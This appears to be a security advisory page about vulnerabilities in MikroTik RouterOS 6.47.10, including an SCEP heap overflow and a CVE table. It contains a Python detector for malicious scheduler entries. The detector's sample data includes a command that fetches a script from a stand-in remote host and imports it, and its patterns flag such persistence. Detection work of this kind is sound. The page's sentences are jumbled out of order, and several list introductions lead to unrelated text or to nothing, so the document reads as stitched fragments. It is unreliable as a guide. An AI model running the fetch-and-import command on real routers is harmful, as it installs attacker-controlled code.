To protect against this exploit, users and administrators of MikroTik devices running RouterOS version 6.47.10 are strongly advised to:
A successful exploit can lead to Remote Code Execution (RCE) without requiring prior authentication.
Inspect /system scheduler print for malicious recurring scripts.
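The scheduler check is easier to do consistently with a small parser than by eyeballing the output. The following Python is an added example, not code from the original page or from MikroTik: it parses the text of `/system scheduler print detail` and flags entries whose `on-event` contains persistence indicators commonly seen on compromised routers (remote fetch, script import, runtime command execution, SOCKS changes) or that run with a broad policy. The sample output embedded below is constructed to resemble the RouterOS format and is not captured from a real device; the indicator list is a starting point, not a complete signature set.

```python
import re

# Constructed sample of `/system scheduler print detail` output (not captured
# from a real device). Entry 1 mimics a persistence pattern: a task that
# periodically fetches a script from a remote host and imports it.
SAMPLE_OUTPUT = """Flags: X - disabled
 0   name="backup" start-date=jan/01/2023 start-time=03:00:00 interval=1d
     on-event="/system backup save name=nightly" owner="admin"
     policy=read,write,test run-count=41

 1   name="u" start-date=jan/01/1970 start-time=startup interval=10m
     on-event="/tool fetch url=http://203.0.113.10/a.rsc mode=http dst-path=a.rsc; /import a.rsc"
     owner="admin" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon
     run-count=1337

 2 X name="old" start-date=jan/01/2023 start-time=12:00:00 interval=1w
     on-event="/log info hello" owner="admin" policy=read run-count=0
"""

# An entry starts with an index, an optional "X" (disabled) flag, then name=...
ENTRY_RE = re.compile(r"^\s*(\d+)\s+(X\s+)?(?=name=)")
# key=value pairs; quoted values may contain spaces and nested '=' signs.
KV_RE = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')

# (pattern over on-event, reason). Hypothetical indicator list for illustration.
INDICATORS = [
    (re.compile(r"/tool\s+fetch"), "fetches remote content"),
    (re.compile(r"(^|[;\s])/import\b"), "imports a script file"),
    (re.compile(r":execute\b"), "builds and executes commands at runtime"),
    (re.compile(r"/ip\s+socks\b"), "modifies the SOCKS proxy"),
    (re.compile(r"/system\s+script\s+run\b"), "runs a stored script"),
]


def parse_scheduler(text):
    """Return a list of dicts, one per scheduler entry, with index/disabled
    fields plus every key=value pair found in the entry (quotes stripped)."""
    entries = []
    current = None
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            current = {"index": int(m.group(1)),
                       "disabled": bool(m.group(2)),
                       "_raw": line[m.end():]}
            entries.append(current)
        elif current is not None and line.strip():
            # Continuation line of the current entry.
            current["_raw"] += " " + line.strip()
    for entry in entries:
        for key, value in KV_RE.findall(entry.pop("_raw")):
            entry[key] = value[1:-1] if value.startswith('"') else value
    return entries


def find_suspicious(entries):
    """Return (name, disabled, reasons) for every entry matching an indicator."""
    findings = []
    for entry in entries:
        on_event = entry.get("on-event", "")
        reasons = [why for rx, why in INDICATORS if rx.search(on_event)]
        policy = set(entry.get("policy", "").split(","))
        if {"sensitive", "password"} & policy:
            reasons.append("runs with sensitive/password policy")
        if reasons:
            findings.append((entry.get("name", "?"), entry["disabled"], reasons))
    return findings


if __name__ == "__main__":
    for name, disabled, reasons in find_suspicious(parse_scheduler(SAMPLE_OUTPUT)):
        state = "disabled" if disabled else "ENABLED"
        print(f"[{state}] scheduler entry {name!r}: " + "; ".join(reasons))
```

Feed it the output of `/system scheduler print detail` copied from a terminal session; a disabled entry is still worth reviewing, since an attacker can re-enable it from any other foothold on the device.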
| CVE | Component | Impact | Fixed in version |
|-----|-----------|--------|------------------|
| CVE-2020-20217 | WinBox | Arbitrary file read (PoC public) | 6.47.8 |
| CVE-2020-20214 | HTTP proxy | Memory corruption (DoS) | 6.47.4 |
| CVE-2019-3977 | SMB service | Unauthenticated RCE | 6.44.4 |
| CVE-2018-1157 | WinBox | Directory traversal (file read) | 6.43 |
RouterOS also has a feature that can disable the physical reset button and Etherboot; attackers have used it in some cases to "lock" owners out of their own devices after a compromise.
While FOISted was about moving from admin to root, the bug discussed here targeted 6.47.10 from the outside.
If you are still running MikroTik RouterOS 6.47.10, you are at significant risk. Follow these steps to secure your device:
The most alarming vulnerability present in 6.47.10 is a heap-based buffer overflow in the Simple Certificate Enrollment Protocol (SCEP) server. An attacker can trigger this overflow to execute arbitrary code on the router and gain full control. Exploitation complexity is elevated, however, because the attacker must know the specific scep_server_name value configured on the target, which effectively requires prior reconnaissance or a service name left at a predictable default. Despite this prerequisite, exploit code exists in the wild, and the vulnerability is rated high risk with a CVSS v3 score of 8.1.
For researchers and penetration testers:
Navigate to System -> Packages and update to the latest available version in the "Stable" or "Long-term" channel (preferably 7.x).
While RCE and privilege escalation typically dominate security discussions, denial of service (DoS) vulnerabilities in network infrastructure can be equally devastating, causing network outages that affect entire organizations.
The following CVEs also affect 6.47.x. They are less frequently discussed, but they form part of the broader risk profile: